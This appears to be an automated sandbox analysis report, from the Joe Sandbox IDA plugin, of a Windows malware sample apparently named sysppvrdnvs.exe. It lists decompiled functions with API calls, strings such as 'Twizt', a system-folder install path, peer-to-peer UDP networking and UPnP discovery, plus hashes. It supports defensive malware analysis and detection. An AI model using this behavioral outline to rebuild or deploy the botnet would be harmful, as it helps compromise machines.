Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94

Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00407726
srand.MSVCRT ref: 0040772D
rand.MSVCRT ref: 00407735
Sleep.KERNEL32 ref: 00407746
StrChrA.SHLWAPI(00000000,0000007C), ref: 0040776C
Sleep.KERNEL32(000003E8), ref: 0040779D

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Sleep$CountTickrandsrand
String ID:
API String ID: 3488799664-0
Opcode ID: 95932355324cd33d74b870fd3c13360e694d795896d581ce62ec288b395a73ba
Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
Opcode Fuzzy Hash: 95932355324cd33d74b870fd3c13360e694d795896d581ce62ec288b395a73ba
Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: b069b6341f395dab984beb8928ef2dc1d0a12e44db74397201ebfa712d18ea75
Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
Opcode Fuzzy Hash: b069b6341f395dab984beb8928ef2dc1d0a12e44db74397201ebfa712d18ea75
Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB

Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4

Strings

\??\, xrefs: 004063B8
?c@, xrefs: 00406369, 004063A8, 0040636C, 004063AB

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: DeviceDriveQueryType
String ID: ?c@$\??\
API String ID: 1681518211-744975932
Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99

Function 00407390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
SysAllocString.OLEAUT32(C:\Windows\sysppvrdnvs.exe), ref: 004073A3
CoUninitialize.OLE32 ref: 004073C8

Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8

SysFreeString.OLEAUT32(00000000), ref: 004073C2

Strings

C:\Windows\sysppvrdnvs.exe, xrefs: 0040739E

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: String$Free$AllocInitializeUninitialize
String ID: C:\Windows\sysppvrdnvs.exe
API String ID: 459949847-2879333202
Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: e871f297b8ec647587383603dc2ce7d0bb970bcccd2ecc260039be8e6d46355a
Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
Opcode Fuzzy Hash: e871f297b8ec647587383603dc2ce7d0bb970bcccd2ecc260039be8e6d46355a
Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA

Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

APIs

Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690

SysFreeString.OLEAUT32(00000000), ref: 004075F8

Strings

Microsoft Corporation, xrefs: 00407566

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CreateFreeInstanceString
String ID: Microsoft Corporation
API String ID: 586785272-3838278685
Opcode ID: f4fe66ce6675b0d6da11f671660511fb708902cff3c761094ed99d43740cd4e9
Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
Opcode Fuzzy Hash: f4fe66ce6675b0d6da11f671660511fb708902cff3c761094ed99d43740cd4e9
Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66

Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA

Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285

Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5

Strings

UDP, xrefs: 0040E158
TCP, xrefs: 0040E13B

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
String ID: TCP$UDP
API String ID: 1519345861-1097902612
Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89

Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSectionmemcpy$EnterLeave
String ID:
API String ID: 469056452-0
Opcode ID: 77efec874a33dc6ef4a00ec3fd77d3dc6f12d8e4685147c5d49fec21481d5cd3
Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
Opcode Fuzzy Hash: 77efec874a33dc6ef4a00ec3fd77d3dc6f12d8e4685147c5d49fec21481d5cd3
Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

Function 0040D550 Relevance: 4.6, APIs: 3, Instructions: 120COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C
InterlockedIncrement.KERNEL32(000000FF), ref: 0040D591
InterlockedDecrement.KERNEL32(000000FF), ref: 0040D694

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Interlocked$DecrementExchangeIncrement
String ID:
API String ID: 2813130747-0
Opcode ID: 2fee3be20291be679849425b2a558d830a1bd18b2d7523083afa5bcd13941f98
Instruction ID: 92f239bb69865f4ea5ccc2fa5ab36589b1b4cdc7d17313df2dab11b9d7d6be27
Opcode Fuzzy Hash: 2fee3be20291be679849425b2a558d830a1bd18b2d7523083afa5bcd13941f98
Instruction Fuzzy Hash: 8A41C3B5E00208BBDF00EBE4DC45FAF7B755B04304F048569B5057B2C2D679E54487A9

Function 0040BE30 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Twizt,?,?,?,?,8@,00000000,8@,0040E038,00000000,00000000), ref: 0040BE7C

Strings

Twizt, xrefs: 0040BE83
Twizt, xrefs: 0040BE77

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: Twizt$Twizt
API String ID: 1659193697-16428492
Opcode ID: f14bce065c89644a6f21cf12e38f72a35e2d7cb85be709d5cf8e4e3a1ae766ed
Instruction ID: 424cb4e193b88585781965e36c58f6fe4c92dd312b0dedf0f064d4bdf42048bf
Opcode Fuzzy Hash: f14bce065c89644a6f21cf12e38f72a35e2d7cb85be709d5cf8e4e3a1ae766ed
Instruction Fuzzy Hash: AE113DB5900108BFDB04DFA8D941E9EB7B5EF48304F14C1A9FD19AB342D635EA10CBA6

Function 0040D840 Relevance: 4.5, APIs: 3, Instructions: 45networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 0040D853
htons.WS2_32(00009E34), ref: 0040D885
connect.WS2_32(000000FF,?,00000010), ref: 0040D89F

Part of subcall function 0040B4F0: shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
Part of subcall function 0040B4F0: closesocket.WS2_32(0040B4DD), ref: 0040B503

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: closesocketconnecthtonsshutdownsocket
String ID:
API String ID: 1987800339-0
Opcode ID: 33603a608139399c0d84bb830c7b48966f7cdbf7a5e618daadc4b0f5ccc7d938
Instruction ID: fe5c709ea45c5a11aa3c9160e55f3cfd3489188b927fc5d3b71a7e9497cbc338
Opcode Fuzzy Hash: 33603a608139399c0d84bb830c7b48966f7cdbf7a5e618daadc4b0f5ccc7d938
Instruction Fuzzy Hash: 91113C74D05209EBCB10DFE4D9096AEB770AF08320F2082A9E525A73D0D7744F05975A

Function 004076C0 Relevance: 4.5, APIs: 3, Instructions: 35threadCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,?,?), ref: 004076E8
CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
CloseHandle.KERNEL32(00000000), ref: 00407711

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThreadmemcpy
String ID:
API String ID: 2064604595-0
Opcode ID: 04a8122a2976dc4ffad86fc0c0be3d86b203506bfba9848779d9363a105f676e
Instruction ID: 1765171bc77b4966af89c460e37a8a9fa1404b8c40c23c814704cc40933dc83e
Opcode Fuzzy Hash: 04a8122a2976dc4ffad86fc0c0be3d86b203506bfba9848779d9363a105f676e
Instruction Fuzzy Hash: 54F090B1A04308FBDB00DFA4DC46F9E7778AB48704F208468FA08A72C1D675BA10C769

Function 0040A820 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803

HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
HeapSetInformation.KERNEL32(02D90000,00000000,00000002,00000004), ref: 0040A876
GetCurrentProcessId.KERNEL32 ref: 0040A87C

Part of subcall function 0040A890: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Process$CurrentHeap$CreateHeapsInformation
String ID:
API String ID: 3179415709-0
Opcode ID: aa0c888e319f0ad9fd531053ca841c15f09ebe8eab889de8fcd1a964cf2e908b
Instruction ID: 85029bc915bf12f33225f801dda82e4fa7d324228b613a3c41ba46cae7947946
Opcode Fuzzy Hash: aa0c888e319f0ad9fd531053ca841c15f09ebe8eab889de8fcd1a964cf2e908b
Instruction Fuzzy Hash: 78F06DB1940305BBD324AB61BC05FA63B65B704305F08C17EEA00DA2D1EB79D810C69E

Function 0040F1F0 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
CloseHandle.KERNEL32(000000FF), ref: 0040F232

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
Instruction ID: 7e163f13d574deee43add6bab66e88a36a5285de070472799180e575aa2043d7
Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
Instruction Fuzzy Hash: A0F03774A40308FBDB20DFA4DC49FCD7B74EB04701F2082A4FA047B2D0D6B55A418B44

Function 0040A760 Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803

RtlAllocateHeap.NTDLL(02D90000,?,-0000000C), ref: 0040A7AA
memset.NTDLL ref: 0040A7E4

Part of subcall function 0040A820: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,0040A777,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A84C
Part of subcall function 0040A820: HeapSetInformation.KERNEL32(02D90000,00000000,00000002,00000004), ref: 0040A876
Part of subcall function 0040A820: GetCurrentProcessId.KERNEL32 ref: 0040A87C

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
String ID:
API String ID: 3494217179-0
Opcode ID: fa29d78d3ce41ca275254412ae4d96764d92337fc642c65f72d4f93bbf2f11ac
Instruction ID: 5fdcc54cffe3c60a089a3a898bb23ed8061fd132f88873fc9f8ce54bcf899a2e
Opcode Fuzzy Hash: fa29d78d3ce41ca275254412ae4d96764d92337fc642c65f72d4f93bbf2f11ac
Instruction Fuzzy Hash: A71112B5D00208BBCB14EFA5DC45F9E7BB9AF44309F04C169F508AB381D638DA64CB99

Function 0040DFD0 Relevance: 3.0, APIs: 2, Instructions: 49synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC

InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040DFFD
WaitForSingleObject.KERNEL32(000006C4,00001388), ref: 0040E047

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
String ID:
API String ID: 3920643007-0
Opcode ID: 18c62cc6d519b2e8afdf3871f58b5d287ebe97866f2e1beb6f2c6a56a98bb43e
Instruction ID: 346b0ed27967947cee21f80887d76a0c9fc99ab28eac90287f9a1883fefaa601
Opcode Fuzzy Hash: 18c62cc6d519b2e8afdf3871f58b5d287ebe97866f2e1beb6f2c6a56a98bb43e
Instruction Fuzzy Hash: C411A1B5E00208ABE704EBE5DC46FAF7735AB04704F14857AF501772D1E6B9AE50CB98

Function 0040B780 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

gethostname.WS2_32(?,00000100), ref: 0040B79C
gethostbyname.WS2_32(?), ref: 0040B7AE

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: gethostbynamegethostname
String ID:
API String ID: 3961807697-0
Opcode ID: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
Instruction ID: d19b970f4f05460fb5f23fa9ea20f915887bff4352c67af57008564f6b42df24
Opcode Fuzzy Hash: 3e0d64d0359f05fd9a79bfd049c8ca7c81df9b12e882189b7266d53aab3380c0
Instruction Fuzzy Hash: 64112E349042188BCB25DB14C844BD8B779EB65314F14C6DAD48967390C7F96DC5CF89

Function 0040B3F0 Relevance: 3.0, APIs: 2, Instructions: 24networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(0040B471), ref: 0040B3FA
gethostbyname.WS2_32(?), ref: 0040B40D

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID:
API String ID: 1594361348-0
Opcode ID: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
Instruction ID: cf68f0f803e5ad204852fc960aab75f2335c53b4724a48f6e286a6dac7d73619
Opcode Fuzzy Hash: 46542f40318f5cfb28b81fc8c4f0329da453caff3e113274fd4b0c2f7b1fac6b
Instruction Fuzzy Hash: 84F0AC78900208EFCB14DFA4E54899DBBB4EB49311F2083A9E905673A0D7749E80DB84

Function 0040B4F0 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

shutdown.WS2_32(0040B4DD,00000002), ref: 0040B4F9
closesocket.WS2_32(0040B4DD), ref: 0040B503

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: closesocketshutdown
String ID:
API String ID: 572888783-0
Opcode ID: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
Instruction ID: e588004495cc6a7b8ebd8d82ef2c96d96882889d66b7c68133776882e6b5d849
